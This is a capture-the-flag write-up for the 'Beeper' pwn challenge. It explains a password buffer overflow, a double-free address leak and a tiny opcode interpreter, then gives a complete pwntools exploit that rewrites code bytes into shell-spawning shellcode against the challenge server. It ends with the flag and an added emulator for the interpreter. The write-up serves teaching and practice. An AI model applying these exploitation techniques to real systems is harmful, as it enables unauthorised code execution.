# [PWN]Beeper - Cpt.shao

xp0int, posted on Mar 12 2018. Tags: Pwn, Buffer-overflow, Shellcode

The vulnerability is a buffer overflow in the password input: a sufficiently long password keeps overwriting the data that the small interpreter below executes. get_pass contains a function that reads a piece of pseudo-code (a string of one-character opcodes) from .bss and performs write operations according to it. We will call this function vm for now.

The first difficulty is reversing the vm function and working out its logic. Its behaviour table is as follows (`input` is the data pointer the writes go through; `heap1` and `heap2` are two cells on the heap):

```
heap1 = 0x57010
heap2 = 0x57030
case '1': --*heap2;
case 'L': ++*heap2;
case 'N': *heap2 = *heap1;
case 'a': --*heap1;
case 'h': ++input;
case 'm': ++*input;
case 'o': --input;
case 'r': ++*heap1;
case 'u': --*input;
case [] : input ? execute : skip
case {} : heap2 ? execute : skip
```

Another point that held me up for a long time: PIE is enabled, and I could not find an address leak. Eventually I noticed that remove also has a double free, and one chunk on the heap stores a pointer into the executable code segment. Doing `remove(0); remove(2); remove(0)` and then showing entry 0 leaks that address. Next, logout re-enters the vm function; the overflow overwrites the base address the vm writes through (it sits at offset 104 of the password buffer, as the script below shows) with the leaked address, and from then on the pseudo-code can write shellcode into the executable segment.

The bytes are not written from scratch: for each byte the program increments or decrements the byte already there (the original code of the buy function, dumped to dump.txt beforehand) until it equals the corresponding shellcode byte, then advances the pointer with `h`. Because of the input length limit (the payload is padded to 1999 bytes, and a single byte can cost up to 255 operations), the 48-byte shellcode is written in two operations of 24 bytes each. Finally the buy operation jumps to the patched code and triggers the shellcode.

## Run.py

```python
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

# opcodes of the interpreter in get_pass (see the behaviour table above)
LSHIFT = b'o'  # --input
RSHIFT = b'h'  # ++input
INC = b'm'     # ++*input
DEC = b'u'     # --*input

PASSWORD = b'\x86\x13\x81\tb\xffD\xd3?\xcd\x19\xb0\xfb\x88\xfd\xae \xdf'

# p = process('./beeper')
p = remote('47.91.210.30', 23333)


def getpass():
    p.sendlineafter(b'password:', PASSWORD + b'\x00' * 85)


def remove(idx):
    p.sendlineafter(b'>>', b'2')
    p.sendlineafter(b'?', str(idx).encode())


def logout(py):
    # logout re-enters get_pass, whose overflow reaches the interpreter state
    p.sendlineafter(b'>>', b'4')
    p.sendlineafter(b'password:', py)


def show(idx):
    p.sendlineafter(b'>>', b'1')
    p.sendlineafter(b':', str(idx).encode())


def leak():
    # double free in remove: after remove(0); remove(2); remove(0) the chunk
    # shown at index 0 holds a pointer into the executable segment
    remove(0)
    remove(2)
    remove(0)
    show(0)
    p.recvuntil(b'number:')
    addr = u64(p.recv(8))
    p.info('addr: %x' % addr)
    return addr


def encode(origin, target, lo, hi):
    # for bytes lo..hi-1: adjust the byte already there to the wanted one
    # with ++/--, then move the pointer one byte forward
    code = b''
    for i in range(lo, hi):
        diff = target[i] - origin[i]
        code += (INC * diff) if diff >= 0 else (DEC * -diff)
        code += RSHIFT
    return code


def vm_payload(base, code):
    # 104 bytes reach the pointer the interpreter writes through; overwrite
    # it with the target address and append the program
    return (PASSWORD.ljust(104, b'\x00') + p64(base) + code).ljust(1999, b'\x00')


getpass()
addr = leak()

# the code the buy function originally jumps to, dumped from the binary to dump.txt
with open('./dump.txt', 'rb') as f:
    origin_code = f.read()[0:0x48]

shellcode = asm(shellcraft.amd64.linux.sh())
# gdb.attach(p, 'b *0x555555554b7a')

# length limit: write the 48-byte shellcode in two halves of 24 bytes
code = encode(origin_code, shellcode, 0, 24)
p.info('length: %d' % len(code))
logout(vm_payload(addr, code))

code2 = encode(origin_code, shellcode, 24, 48)
p.info('length: %d' % len(code2))
logout(vm_payload(addr + 24, code2))

p.interactive()
```

## Flag

N1CTF{5h3l1_c0d1n9_w17h_Hbf_1s_s0_e45y_233}
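## Emulating the vm op table

The following is an added example, not code from the original write-up: a small emulator for the behaviour table above, plus a generator that produces the `m`/`u`/`h` program needed to rewrite one byte string into another, which is exactly what the exploit feeds the interpreter to turn the buy stub into shellcode. It goes one step beyond the write-up's script by picking the shorter direction modulo 256 for each byte, which shortens the program when the target byte is far from the existing one. Assumptions not stated on the page: the data pointer walks over byte cells (so `++`/`--` wrap mod 256), `[ ]` and `{ }` are brainfuck-style loops keyed on `*input` and on `heap2`, and unrecognised characters are no-ops. `ORIGIN` and `TARGET` are constructed stand-ins, not the real dump or real shellcode.

```python
"""Emulator for the get_pass interpreter's op table plus a generator for the
byte-rewrite programs the exploit feeds it. Added example, not code from the
write-up. Assumed (not stated on the page): byte cells wrapping mod 256,
'[ ]' / '{ }' as brainfuck-style loops on *input / heap2, unknown chars no-op."""

# op table from the write-up, keyed by opcode character
OPS = {
    '1': 'dec_heap2', 'L': 'inc_heap2', 'N': 'mov_heap2_heap1',
    'a': 'dec_heap1', 'r': 'inc_heap1',
    'h': 'inc_ptr', 'o': 'dec_ptr', 'm': 'inc_cell', 'u': 'dec_cell',
}
OPEN, CLOSE = '[{', ']}'


def match_brackets(program):
    """Return a dict pairing every '['/'{' with its ']'/'}' and vice versa."""
    pairs, stack = {}, []
    for i, c in enumerate(program):
        if c in OPEN:
            stack.append((c, i))
        elif c in CLOSE:
            if not stack or OPEN[CLOSE.index(c)] != stack[-1][0]:
                raise ValueError('unbalanced %r at offset %d' % (c, i))
            _, j = stack.pop()
            pairs[i], pairs[j] = j, i
    if stack:
        raise ValueError('unclosed %r at offset %d' % stack[-1])
    return pairs


def run_vm(program, mem, ptr=0, heap1=0, heap2=0, max_steps=1_000_000):
    """Interpret program over a copy of mem; return (mem, ptr, heap1, heap2).
    Out-of-range cell access raises IndexError here (the real binary just
    writes wherever the overflowed pointer points, which is the exploit)."""
    mem = bytearray(mem)
    pairs = match_brackets(program)

    def cell():  # current cell index, bounds-checked
        if not 0 <= ptr < len(mem):
            raise IndexError('data pointer %d outside emulated memory' % ptr)
        return ptr

    pc = steps = 0
    while pc < len(program):
        steps += 1
        if steps > max_steps:
            raise RuntimeError('step limit exceeded, runaway loop?')
        c = program[pc]
        op = OPS.get(c)
        if op == 'inc_ptr':
            ptr += 1
        elif op == 'dec_ptr':
            ptr -= 1
        elif op == 'inc_cell':
            mem[cell()] = (mem[cell()] + 1) & 0xff
        elif op == 'dec_cell':
            mem[cell()] = (mem[cell()] - 1) & 0xff
        elif op == 'inc_heap1':
            heap1 += 1
        elif op == 'dec_heap1':
            heap1 -= 1
        elif op == 'inc_heap2':
            heap2 += 1
        elif op == 'dec_heap2':
            heap2 -= 1
        elif op == 'mov_heap2_heap1':
            heap2 = heap1
        elif c == '[' and mem[cell()] == 0:
            pc = pairs[pc]
        elif c == ']' and mem[cell()] != 0:
            pc = pairs[pc]
        elif c == '{' and heap2 == 0:
            pc = pairs[pc]
        elif c == '}' and heap2 != 0:
            pc = pairs[pc]
        pc += 1
    return mem, ptr, heap1, heap2


def gen_patch(src, dst, wrap=True):
    """Program that rewrites src into dst in place, one 'h' per byte. With
    wrap=True take the shorter direction mod 256 (needs byte cells, assumed);
    wrap=False is the signed difference the write-up's script uses."""
    if len(src) != len(dst):
        raise ValueError('src and dst must have equal length')
    out = []
    for a, b in zip(src, dst):
        if wrap:
            d = (b - a) % 256
            out.append('m' * d if d <= 128 else 'u' * (256 - d))
        else:
            d = b - a
            out.append('m' * d if d >= 0 else 'u' * -d)
        out.append('h')
    return ''.join(out)


def verify_patch(src, dst, wrap=True):
    """True if running the generated program over src leaves dst in memory."""
    mem = run_vm(gen_patch(src, dst, wrap), src)[0]
    return bytes(mem) == bytes(dst)


# constructed stand-ins, not the real dump.txt bytes or real shellcode
ORIGIN = bytes(range(0x40, 0x58))   # 24 bytes "already there"
TARGET = b'/bin/sh\x00' * 3         # 24 bytes we want written

if __name__ == '__main__':
    for wrap in (False, True):
        prog = gen_patch(ORIGIN, TARGET, wrap)
        print('wrap=%-5s len=%4d ok=%s' % (wrap, len(prog), verify_patch(ORIGIN, TARGET, wrap)))
```

Running the script prints the program length with and without wrap-around for the constructed bytes and confirms, by emulation, that both programs leave `TARGET` in memory. Before sending a real payload, run the generated program through `run_vm` over the dumped bytes and compare the result with the shellcode; this catches an off-by-one in the chunk split or a wrong base address offset without touching the target.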